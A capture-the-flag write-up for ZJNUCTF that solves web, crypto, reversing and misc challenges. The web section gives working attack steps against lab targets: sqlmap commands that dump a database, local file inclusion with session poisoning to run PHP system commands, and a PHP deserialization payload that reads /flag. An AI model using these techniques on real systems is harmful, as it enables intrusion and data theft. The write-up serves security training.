WEB
1.easy_php
<?php
highlight_file("index.php"); # show this file's source with syntax highlighting
include("flag.php"); # include flag.php
$_aaa = "No No No";
$_bbb = "Welcome";
if($_SERVER["REQUEST_METHOD"]!="POST"){ # check whether the request method is POST; if not, die
    die("\n"."Welcome to ZJNUCTF!");
}
if(!isset($_POST["flag"])){ # a POST variable named flag must be sent
    die ($_aaa);
}
foreach ($_GET as $key => $value){ # iterate over the GET parameters
    $$key = $$value;
}
foreach ($_POST as $key => $value){ # iterate over the POST parameters
    $$key = $value;
}
if ($_POST["flag"]!==$flag){ # if the posted value differs from the variable in flag.php, die
    die($_aaa);
}
else
{
    echo "This is your flag : ".$flag."\n";
    die($_bbb);
}
?>
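The code is analysed in the comments above. In short, you have to POST a flag, and if it matches the original flag it is printed.
Reference: https://www.freebuf.com/column/150731.html
This uses a variable-overwrite vulnerability: the first foreach assigns the value of $flag to $_bbb, and die($_bbb) then prints the original flag value.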
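A small Python model of the two foreach loops, added here as an illustration and not part of the challenge source. The secret is a placeholder and run_fixed is a hypothetical hardened variant; the model shows that the POST loop overwrites $flag before the comparison, so the check always passes, and that the GET loop can copy $flag into $_bbb first.

```python
import hmac

SECRET = "flag{PLACEHOLDER}"  # constructed stand-in for the value in flag.php

def run_index(get, post):
    """Model of index.php: returns the text the script would print."""
    sym = {"_aaa": "No No No", "_bbb": "Welcome", "flag": SECRET}
    if "flag" not in post:
        return sym["_aaa"]
    for key, value in get.items():    # $$key = $$value: variable copied to variable
        sym[key] = sym.get(value)
    for key, value in post.items():   # $$key = $value: request data replaces variable
        sym[key] = value
    if post["flag"] != sym["flag"]:   # always equal: $flag now holds the posted value
        return sym["_aaa"]
    return "This is your flag : " + sym["flag"] + "\n" + (sym["_bbb"] or "")

def run_fixed(get, post):
    """Hypothetical hardened variant: request keys never become variable names."""
    guess = post.get("flag")
    if not isinstance(guess, str):
        return "No No No"
    # constant-time comparison against the untouched secret
    if not hmac.compare_digest(guess.encode(), SECRET.encode()):
        return "No No No"
    return "This is your flag : " + SECRET + "\nWelcome"

if __name__ == "__main__":
    print(run_index({}, {"flag": "x"}))                # check passes, echoes "x"
    print(run_index({"_bbb": "flag"}, {"flag": "x"}))  # die($_bbb) prints the secret
    print(run_fixed({"_bbb": "flag"}, {"flag": "x"}))  # rejected
```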
Construct the payload:
2.Easysql
Nothing much to say: sqlmap does it all in one go.
First capture the request with BP (Burp Suite) and save it as 2.txt
python2 sqlmap.py -r 2.txt --dbs --thread 5
After one run I tried sys first, found it was not the right database, and the right one is the test database:
python2 sqlmap.py -r 2.txt -D test --tables --thread 5
python2 sqlmap.py -r 2.txt -D test -T flag --columns --thread 5
python2 sqlmap.py -r 2.txt -D test -T flag -C flag --dump --thread 5
3.lfi2rce
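Open the link; the hint is:
The hint mentions user.php and phpinfo.php. Visiting each, phpinfo.php is accessible and exposes a range of information about the PHP setup.
index.php has a file inclusion vulnerability, include($_POST['file']);. By submitting a file variable you can obtain the source of the file you want. It is used like this: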
file=php://filter/read=convert.base64-encode/resource=user.php
PD9waHANCiAgICBzZXNzaW9uX3N0YXJ0KCk7DQogICAgZWNobyAkX0NPT0tJRVsndXNlciddOw0KICAgICRfU0VTU0lPTlsnbmFtZSddID0gJF9DT09LSUVbJ3VzZXInXTsNCg==
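Base64-decoding it gives:
<?php
    session_start();
    echo $_COOKIE['user'];
    $_SESSION['name'] = $_COOKIE['user'];
Here there is another vulnerability: file inclusion via the cookie. First, analyse the code:
echo $_COOKIE['user'];
Here we need to supply a parameter named user, sent as a cookie.
$_SESSION['name'] = $_COOKIE['user'];
This assigns the value passed in the cookie to the session.
First we send an arbitrary value:
A cookie was sent with the value admin.
Then go to the corresponding path shown in phpinfo to look for the cookie: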
/var/lib/php/sessions
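This is the storage path; the storage format is sess_ + the cookie value.
The cookie value can be viewed at:
4stodq9feohijqk3jb9dlshjg4
This is the cookie.
So the absolute path where the cookie is stored is: /var/lib/php/sessions/sess_4stodq9feohijqk3jb9dlshjg4
We then use the file inclusion vulnerability in index.php to include the cookie: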
bmFtZXxzOjU6ImFkbWluIjs=
==>name|s:5:"admin";
After base64-decoding the returned data, we find the cookie we uploaded. So we can use this vulnerability to execute PHP commands:
Construct a malicious username:
<?php system("ls"); ?>
bmFtZXxzOjE4OiI8P3BocCBzeXN0ZW0oImxzIikiOw==
==>name|s:18:"<?php system("ls")";
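Here the base64-decoded result differs from the parameter we uploaded; it was probably filtered. Find a way around it: bypass with URL encoding.
Viewing the source shows that our upload succeeded:
Then include the cookie again through the vulnerability: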
bmFtZXxzOjIyOiI8P3BocCBzeXN0ZW0oImxzIik7ID8+Ijs=
==>name|s:22:"<?php system("ls"); ?>";
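Why does it still not display? I don't know why either. After an afternoon of struggling, it occurred to me by chance to see what would happen without base64, so: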
file=php://filter/read=convert/resource=/var/lib/php/sessions/sess_28sfnijqudr01hk8smaqkpblq3
Found the file name; including it through the file inclusion vulnerability gives the flag:
flag{36ab1c89-82fc-4ad6-a459-8af09703d2e7}
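A defender-side check for the session poisoning described above, added here and not part of the original writeup: it parses the key|s:N:"value"; layout seen in the decoded session files and reports string values that contain a PHP open tag. The function names and sample byte strings are constructed for illustration, only string-typed entries are handled, and the default directory is the path quoted above.

```python
import os
import re

ENTRY = re.compile(rb'([^|;]+)\|s:(\d+):"')   # key|s:<byte length>:"

# Constructed samples in the layout of the decoded session files above.
CLEAN = b'name|s:5:"admin";'
POISONED = b'name|s:22:"<?php system("ls"); ?>";'

def session_strings(data):
    """Return (key, value) for each leading string entry of a session file."""
    out, pos = [], 0
    while pos < len(data):
        m = ENTRY.match(data, pos)
        if not m:
            break                      # non-string entry or malformed data
        start = m.end()
        end = start + int(m.group(2))
        # The length prefix delimits the value, so quotes and semicolons
        # inside it do not end the entry.
        if data[end:end + 2] != b'";':
            break                      # declared length does not fit the data
        out.append((m.group(1).decode(errors="replace"), data[start:end]))
        pos = end + 2
    return out

def poisoned_entries(data):
    """Keys whose string value contains a PHP open tag."""
    return [key for key, value in session_strings(data) if b"<?" in value]

def scan_dir(path="/var/lib/php/sessions"):
    """Map session file name -> suspicious keys for every sess_* file."""
    hits = {}
    for entry in os.scandir(path):
        if entry.is_file() and entry.name.startswith("sess_"):
            with open(entry.path, "rb") as fh:
                keys = poisoned_entries(fh.read())
            if keys:
                hits[entry.name] = keys
    return hits

if __name__ == "__main__":
    print(poisoned_entries(CLEAN), poisoned_entries(POISONED))
```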
4.Babyweb
The source is as follows:
<?php
# flag in /flag
class red
{
    private $filename = 'index.php';
    function __toString()
    {
        return file_get_contents($this->filename);
    }
}
function check($s) { // this function requires every input character's ASCII value to be between 32 and 125 (so %00 cannot be sent)
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}
if(isset($_GET{'exp'})) {
    $exp = (string)$_GET['exp'];
    if(check($exp)) {
        $obj = unserialize($exp);
        echo $obj;
    }
}
highlight_file(__FILE__);
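It is actually simple: a PHP deserialization vulnerability. The thing to note is that filename here is a private property.
A variable declared private produces two null bytes when serialized. A null byte is normally written %00, but since the check() function does not allow %00 as input, \00 has to be used instead. I did not know this, so I got stuck.
The PHP script is as follows:
<?php
class red
{
    private $filename = '/flag';
}
$a = new red();
echo serialize($a);
?>
Here <0x00> is the null byte; if you copy it directly, pasting stops at this point. In addition, the lowercase s has to be changed to uppercase (an expert said this is a feature of the PHP version).
Sure enough, after the change the upload worked without problems. I'm such a noob.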
Crypto
1.hex
Base64-decode it, then put it into WinHex and it comes out.
This gives 666c61677b35306338383535372d653165632d346131302d623439652d3034616130383764303837327d
2.xor
The source is as follows:
key="hello"
flag="*****************************************"
def pad(x,y):
    y=y + (len(x) - len(y)) * chr(len(x) - len(y))
    return y
def xor(x1,x2):
    c=''
    for i in range(len(x1)):
        c=c+chr(ord(x1[i:i+1])^ord(x2[i:i+1]))
    return c
msg=xor(pad(flag,key),flag)
msg=msg.encode()
#msg=b'\x0e\t\r\x0b\x14E\x17\x1dG\x1dGG\t\x1c\x15\x11\x13\t\x15\x15AE\tFG\x11\x11\t\x14\x16\x10\x16EG\x15\x17\x14\x14\x14\x17Y'
Sorting out the logic:
With the lengths of flag and key fixed, the output of the pad function is a fixed value.
The xor function XORs x1 and x2 position by position.
XOR is its own inverse. pad is run first to produce a value (a string) M; M XORed with flag gives msg, and we want flag. We only need to XOR msg with M.
M is fixed once the flag length and the key are known, so the challenge is solved.
The script is as follows:
key="hello"
flag="*****************************************"
def pad(x,y):
    y=y + (len(x) - len(y)) * chr(len(x) - len(y))
    return y
def xor(x1,x2):
    c=''
    for i in range(len(x1)):
        c=c+chr(ord(x1[i:i+1])^ord(x2[i:i+1]))
    return c
msg = b'\x0e\t\r\x0b\x14E\x17\x1dG\x1dGG\t\x1c\x15\x11\x13\t\x15\x15AE\tFG\x11\x11\t\x14\x16\x10\x16EG\x15\x17\x14\x14\x14\x17Y'
msg = msg.decode()
print(xor(pad(flag,key), msg))
flag{a39c9cc-8157-11ea-bc55-0242ac130003}
reverse
1.Signin
Decompile it with IDA; Shift+F12 shows the flag directly.
2.Unpack it with upx on Linux, then decompile it with IDA.
3.RePY
The script is as follows:
enc = [
    34, 44, 39, 33, 61,
    34, 115, 114, 117, 118,
    116, 119, 120, 107, 35,
    36, 36, 119, 107, 116,
    127, 116, 37, 107, 127,
    37, 37, 120, 107, 119,
    127, 117, 116, 36, 119,
    115, 38, 37, 36, 119,
    119, 59]
for i in enc:
    print(chr(i - 1 ^ 71),end='')
#flag{f5632410-edd1-494c-9cc0-1934d15bcd11}
4.Jvav
Decompiling with jadx gives the source
package defpackage;
import java.util.Scanner;
/* renamed from: Main */
public class Main {
    public static void main(String[] args) {
        char[] enc = new char[]{'Ƙ', 'ư', 'Ƅ', 'Ɯ', 'Ǭ', 'Ð', 'Ì', 'Ƅ', 'Ƅ', 'Ɣ', 'Ä', 'ƌ', 'à', '´', 'à', 'Ü', 'À', 'ƌ', '´', 'Ð', 'ä', 'Ɛ', 'À', '´', 'à', 'ä', 'Ô', 'à', '´', 'Ô', 'Ì', 'Ɛ', 'Ä', 'À', 'Ø', 'à', 'ä', 'à', 'à', 'Ð', 'à', 'Ǵ'};
        String str = new String();
        System.out.print("Please input the flag: ");
        str = new Scanner(System.in).nextLine();
        if (str.length() != 42) {
            System.out.println("Wrong!");
            return;
        }
        for (int i = 0; i < 42; i++) {
            if ((((str.charAt(i) << 3) + 1) >> 1) != enc[i]) {
                System.out.println("Wrong!");
                return;
            }
        }
        System.out.println("Right!");
    }
}
The key part is the final for loop: each flag character is shifted left by 3 bits, 1 is added, and the result is shifted right by 1 bit. I don't really understand what shifting is; reversing it in Java is enough.
Java script:
public class a1 {
    public static void main(String[] args) {
        char[] enc = new char[]{'Ƙ', 'ư', 'Ƅ', 'Ɯ', 'Ǭ', 'Ð', 'Ì', 'Ƅ', 'Ƅ', 'Ɣ', 'Ä', 'ƌ', 'à', '´', 'à', 'Ü', 'À', 'ƌ', '´', 'Ð', 'ä', 'Ɛ', 'À', '´', 'à', 'ä', 'Ô', 'à', '´', 'Ô', 'Ì', 'Ɛ', 'Ä', 'À', 'Ø', 'à', 'ä', 'à', 'à', 'Ð', 'à', 'Ǵ'};
        for (int i = 0; i < 42; i++) {
            System.out.print(((enc[i] << 1) - 1) >> 3);
            System.out.print(',');
        }
        System.out.println("Right!");
    }
}
This yields a string of numbers:
101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124
These are probably ASCII codes, so convert them with Python:
list = [101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124]
for i in list:
    print(chr(i),end='')
But the result is wrong:
ek`fz32``d0b7,76/b,38c/,7847,42c0/5787737|
Change the code to use i+1 and it is correct:
list = [101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124]
for i in list:
    print(chr(i+1),end='')
flag{43aae1c8-870c-49d0-8958-53d106898848}
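Why the +1 was needed, as an added Python example that is not part of the original writeup: for a character code c, ((c << 3) + 1) >> 1 equals 4c, so the exact inverse is enc >> 2, while ((enc << 1) - 1) >> 3 computes (8c - 1) >> 3 = c - 1. ENC holds the code points of the characters in the enc array above; the function names are hypothetical.

```python
# Code points of the 42 characters in the Java enc array above.
ENC = [408, 432, 388, 412, 492, 208, 204, 388, 388, 404, 196, 396, 224, 180,
       224, 220, 192, 396, 180, 208, 228, 400, 192, 180, 224, 228, 212, 224,
       180, 212, 204, 400, 196, 192, 216, 224, 228, 224, 224, 208, 224, 500]

def forward(c):
    """The check in Main: ((c << 3) + 1) >> 1 = (8c + 1) // 2 = 4c."""
    return ((c << 3) + 1) >> 1

def naive_inverse(e):
    """The writeup's inversion: (2e - 1) >> 3 = (8c - 1) // 8 = c - 1."""
    return ((e << 1) - 1) >> 3

def exact_inverse(e):
    """Since forward(c) == 4c, dividing by 4 recovers c exactly."""
    if e & 3:
        raise ValueError("not a value produced by forward()")
    return e >> 2

def decode(enc):
    """Recover the checked string from the encoded code points."""
    return "".join(chr(exact_inverse(e)) for e in enc)

if __name__ == "__main__":
    print([naive_inverse(e) for e in ENC][:5])   # one below each character code
    print(decode(ENC))
```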
5.Sharpener
// test.Program
// Token: 0x06000002 RID: 2 RVA: 0x000020D0 File Offset: 0x000002D0
private static void Main(string[] args)
{
    string[] enc = new string[]
    {
        "61894b21be75260c4964065b1eecec4d",
        "3cd02adb6df3f967c3acda1705bb86f1",
        "5c04925674920eb58467fb52ce4ef728",
        "ffbb466329361588defb5e30e5df168f",
        "448804aefe27492b9c183351328e7500",
        "598f5f04d65b4e0e35515b367763fee6",
        "d4398f22c157274df2d4643884db6a56",
        "37afcb75609159217c5548ed91c0ba1b",
        "28cb510090e7e926daa92745a8b02362",
        "49f01756d2edd088b64afd670400f4ac",
        "9f396fe44e7c05c16873b05ec425cbad",
        "958be1aac9d0641822a4dbaa3ad9010f",
        "82c89ed04868c75db962bb3bbe2d4b4c",
        "36f88e7b053afdaff9f9d792d142a406"
    };
    Console.Write("Please input the flag: ");
    string userInput = Console.ReadLine();
    int x = 0;
    int ul = 0;
    string tmp = "";
    if (userInput.Length != 42)
    {
        Console.WriteLine("That Wrong!");
        return;
    }
    for (int i = 0; i < userInput.Length; i++)
    {
        tmp += userInput[i].ToString();
        x++;
        if (x % 3 == 0)
        {
            if (!enc[ul].Equals(Program.GenerateMD5(tmp)))
            {
                Console.WriteLine("That Wrong!");
                return;
            }
            x = 0;
            tmp = "";
            ul++;
        }
    }
    Console.WriteLine("Right!");
}
Crack these MD5 values and concatenate the results to get the flag
flag{b66931c0-ec9f-4d1e-bcff-5673ce3d505b}
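Why hashing the input three characters at a time gives no protection, as an added Python example that is not part of the original writeup: one lookup table over every 3-character string serves all 14 digests. It assumes GenerateMD5 is a plain lowercase-hex MD5 of the chunk's bytes and that the flag uses only the characters in ALPHABET; both are assumptions, as are the function names.

```python
import hashlib
from itertools import product

# MD5 digests of the fourteen 3-character chunks, copied from the enc array above.
ENC = [
    "61894b21be75260c4964065b1eecec4d", "3cd02adb6df3f967c3acda1705bb86f1",
    "5c04925674920eb58467fb52ce4ef728", "ffbb466329361588defb5e30e5df168f",
    "448804aefe27492b9c183351328e7500", "598f5f04d65b4e0e35515b367763fee6",
    "d4398f22c157274df2d4643884db6a56", "37afcb75609159217c5548ed91c0ba1b",
    "28cb510090e7e926daa92745a8b02362", "49f01756d2edd088b64afd670400f4ac",
    "9f396fe44e7c05c16873b05ec425cbad", "958be1aac9d0641822a4dbaa3ad9010f",
    "82c89ed04868c75db962bb3bbe2d4b4c", "36f88e7b053afdaff9f9d792d142a406",
]
# Assumption: only the characters seen in this page's other flags are used.
ALPHABET = "0123456789abcdef" + "lg{}-"

def chunk_digests(text, size=3):
    """Hash a string the way Main() does: MD5 of each size-character chunk."""
    return [hashlib.md5(text[i:i + size].encode()).hexdigest()
            for i in range(0, len(text), size)]

def crack_chunks(digests, alphabet=ALPHABET, size=3):
    """Recover chunks by hashing every candidate once; None means no match."""
    table = {}
    for combo in product(alphabet, repeat=size):
        chunk = "".join(combo)
        table[hashlib.md5(chunk.encode()).hexdigest()] = chunk
    return [table.get(d.lower()) for d in digests]

def search_space(alphabet=ALPHABET, size=3):
    """Number of candidates hashed: one table covers every chunk."""
    return len(alphabet) ** size

if __name__ == "__main__":
    print(search_space(), "candidates instead of", len(ALPHABET) ** 42)
    print("".join(c or "???" for c in crack_chunks(ENC)))
```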
6.Bytecoding
This challenge is kind of interesting: what you get is a text document with the following content:
3 0 LOAD_CO
56 LOAD_CONST 12 (44)
58 LOAD_CONST 1 (101)
60 LOAD_CONST 14 (48)
62 LOAD_CONST 15 (53)
64 LOAD_CONST 7 (98)
66 LOAD_CONST 9 (51)
68 LOAD_CONST 11 (56)
70 LOAD_CONST 18 (99)
72 LOAD_CONST 1 (101)
74 LOAD_CONST 15 (53)
76 LOAD_CONST 7 (98)
78 LOAD_CONST 7 (98)
80 LOAD_CONST 7 (98)
82 LOAD_CONST 19 (124)
84 BUILD_LIST 42
86 STORE_FAST 0 (enckey)
4 88 LOAD_GLOBAL 0 (input)
90 LOAD_CONST 20 ('GoGoGo Input Flag: ')
92 CALL_FUNCTION 1
94 STORE_FAST 1 (inpt)
5 96 LOAD_GLOBAL 1 (len)
98 LOAD_FAST 1 (inpt)
100 CALL_FUNCTION 1
102 LOAD_CONST 21 (42)
104 COMPARE_OP 3 (!=)
106 POP_JUMP_IF_FALSE 120
6 108 LOAD_GLOBAL 2 (print)
110 LOAD_CONST 22 ('Wrong')
112 CALL_FUNCTION 1
114 POP_TOP
7 116 LOAD_CONST 0 (None)
118 RETURN_VALUE
8 >> 120 SETUP_LOOP 52 (to 174)
122 LOAD_GLOBAL 3 (range)
124 LOAD_CONST 21 (42)
126 CALL_FUNCTION 1
128 GET_ITER
>> 130 FOR_ITER 40 (to 172)
132 STORE_FAST 2 (i)
9 134 LOAD_FAST 0 (enckey)
136 LOAD_FAST 2 (i)
138 BINARY_SUBSCR
140 LOAD_GLOBAL 4 (ord)
142 LOAD_FAST 1 (inpt)
144 LOAD_FAST 2 (i)
146 BINARY_SUBSCR
148 CALL_FUNCTION 1
150 LOAD_CONST 23 (1)
152 BINARY_SUBTRACT
154 COMPARE_OP 3 (!=)
156 POP_JUMP_IF_FALSE 130
10 158 LOAD_GLOBAL 2 (print)
160 LOAD_CONST 22 ('Wrong')
162 CALL_FUNCTION 1
164 POP_TOP
11 166 LOAD_CONST 0 (None)
168 RETURN_VALUE
170 JUMP_ABSOLUTE 130
>> 172 POP_BLOCK
12 >> 174 LOAD_GLOBAL 2 (print)
176 LOAD_CONST 24 ('Right')
178 CALL_FUNCTION 1
180 POP_TOP
182 LOAD_CONST 0 (None)
184 RETURN_VALUE
At first I thought this was assembly, but it is actually Python bytecode.
I looked through it and barely understood a little.
0 LOAD_CO
56 LOAD_CONST 12 (44)
58 LOAD_CONST 1 (101)
60 LOAD_CONST 14 (48)
62 LOAD_CONST 15 (53)
64 LOAD_CONST 7 (98)
66 LOAD_CONST 9 (51)
68 LOAD_CONST 11 (56)
70 LOAD_CONST 18 (99)
72 LOAD_CONST 1 (101)
74 LOAD_CONST 15 (53)
76 LOAD_CONST 7 (98)
78 LOAD_CONST 7 (98)
80 LOAD_CONST 7 (98)
82 LOAD_CONST 19 (124)
84 BUILD_LIST 42
86 STORE_FAST 0 (enckey)
The first block should be an array (a list) containing the values ['101','107','96','102','122','49','98','47','96','101','51','52','56','44','54','98','96','48','44','51','96','51','53','44','97','55','48','54','44','101','48','53','98','51','56','99','101','53','98','98','98','124'].
88 LOAD_GLOBAL 0 (input)
90 LOAD_CONST 20 ('GoGoGo Input Flag: ') inpt=input("GoGoGo Input Flag:")
92 CALL_FUNCTION 1
94 STORE_FAST 1 (inpt)
The second block should decompile to a single line of code: inpt=input("GoGoGo Input Flag:")
96 LOAD_GLOBAL 1 (len)
98 LOAD_FAST 1 (inpt)
100 CALL_FUNCTION 1
102 LOAD_CONST 21 (42)
104 COMPARE_OP 3 (!=)
106 POP_JUMP_IF_FALSE 120
108 LOAD_GLOBAL 2 (print)
110 LOAD_CONST 22 ('Wrong')
112 CALL_FUNCTION 1
114 POP_TOP
The third and fourth blocks are roughly
if len(inpt) != 42:
    print("wrong")
After that I could not really follow it; roughly, inpt and enckey go through some calculation, and some condition has to be met to print right.
Looking at it, the ASCII code of f is 102 and the first value of enckey is 101, so let's see what comes out after adding 1 to each one.
The script:
list=['101','107','96','102','122','49','98','47','96',
      '101','51','52','56','44','54','98','96','48','44','51',
      '96','51','53','44','97','55','48','54','44','101','48',
      '53','98','51','56','99','101','53','98','98','98','124']
for i in list:
    print(chr(int(i)+1),end='')
flag{2c0af459-7ca1-4a46-b817-f16c49df6ccc}
This is just too magical.
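The loop that the disassembly encodes (offsets 120 to 174), reconstructed as an added Python example that is not part of the original writeup: offsets 134 to 154 compare enckey[i] with ord(inpt[i]) - 1, so each flag character is chr(enckey[i] + 1). ENCKEY is the list given above; check returns a bool instead of printing, a change made here so the result can be tested.

```python
# The 42 constants collected by BUILD_LIST, as listed in the writeup above.
ENCKEY = [101, 107, 96, 102, 122, 49, 98, 47, 96, 101, 51, 52, 56, 44,
          54, 98, 96, 48, 44, 51, 96, 51, 53, 44, 97, 55, 48, 54, 44,
          101, 48, 53, 98, 51, 56, 99, 101, 53, 98, 98, 98, 124]

def check(inpt):
    """Source-level equivalent of source lines 5 to 12 of the disassembly."""
    if len(inpt) != 42:                    # offsets 96-106
        return False                       # offsets 108-118: print('Wrong'); return
    for i in range(42):                    # offsets 120-132
        # offsets 134-154: enckey[i] != ord(inpt[i]) - 1
        if ENCKEY[i] != ord(inpt[i]) - 1:
            return False                   # offsets 158-168: print('Wrong'); return
    return True                            # offsets 174-178: print('Right')

def solve(enckey):
    """Invert the comparison: ord(c) - 1 == k, so c == chr(k + 1)."""
    return "".join(chr(k + 1) for k in enckey)

if __name__ == "__main__":
    candidate = solve(ENCKEY)
    print(candidate, check(candidate))
```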
Misc
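1.Sign-in challenge
Follow the official account and reply zjnuctf to get the flag
2.Real sign-in
The download is a Word document; showing the hidden text gives the flag.
3.Do you know Han Xin Code?
Find the four corners online and piece them together to get the image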
4.Keyboard
References:
https://www.cnblogs.com/hackxf/p/10670844.html
https://blog.csdn.net/qq_36609913/article/details/78578406
Now run the following command on Linux:
tshark -r keyboard.pcapng -T fields -e usb.capdata > usbdata.txt
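This gives a bunch of digits:
Each line has 16 digits; two digits form one position, so there are 8 positions. The digits in the 3rd position correspond to the letter we typed on the keyboard.
The lookup table is as follows: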
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
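Having dealt with the third position, look at the first one: sometimes it is 0 and sometimes 2. My blind guess is that a 2 in the first position means the Shift key is held down. Checking this, the first few characters come out as exactly flag{
Build the script: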
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
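flag=''
f = open('usbdata.txt','r')
for i in range(200):  # 200 is an upper bound on the number of lines read
    l = f.readline()
    if not l:  # end of file: stop here instead of raising IndexError on l[0]
        break
    if l[4:6] == '00':
        continue
    elif l[0]=='2':
        flag += shiftKeys[l[4:6]]
    elif l[0]=='0':
        flag += normalKeys[l[4:6]]
    else:
        continue
f.close()
print(flag)
#flag{4565fd58-c9b2-4544-86f7-872e38433467}
Here, because I did not know how many lines there were, I ran it a few more times; Python stops automatically when it reaches an error.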
5.Fun Minecraft
Open the image in WinHex; at the very end there is a line of base64, which decodes to cnserver.bi0x.cn
Open the game and join the server.
flag{22a61e26-6a6c-4130-a39a-15f0ce5c15fc}
6.zip
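The password is UVWHZAITWAU
The image contains four kinds of cipher: the first is MIMIMOYS, the second is the galactic alphabet, the third is little figures waving flags, and the fourth is the bird totem.
I don't know what the first and fourth are, but that does not stop me from brute-forcing.
Matching against the tables originally gave HZAIYQ, some of the letters in the middle; the first three and the last two positions are blind guesses, so brute force handles them.
The dictionary-generation script:
list='HZAITQ'
all='ABCDEFGHIJKLMNOPQRSTUVWXYZ'
print(len(all))
f=open("pass.txt","a")
for i in all:
    for j in all:
        for k in all:
            for l in all:
                for m in all:
                    # three guessed letters + six known letters + two guessed letters
                    flag=i+j+k+list+l+m
                    f.write(flag+"\n")
f.close()
It ran for quite a while, but the result was not right. I checked everything carefully once more and it was still wrong.
So the error had to be in the six known characters. Guessing first that only one of them was wrong, I tried six times, which took quite a while, and finally found that of the six known characters the last one was wrong: it is W. orz
Then open the archive to get the flag.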
7.Interesting video
flag:000{w3lc0me_1337_players_and_good_luck_with_the_game}
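This part is Morse code, .-/-./-.. , which translates to and
This part is flag semaphore, which translates to the.
Running it on the Linux command line gives game
Putting it together: 000{w3lc0me_1337_players_and_good_luck_with_the_game}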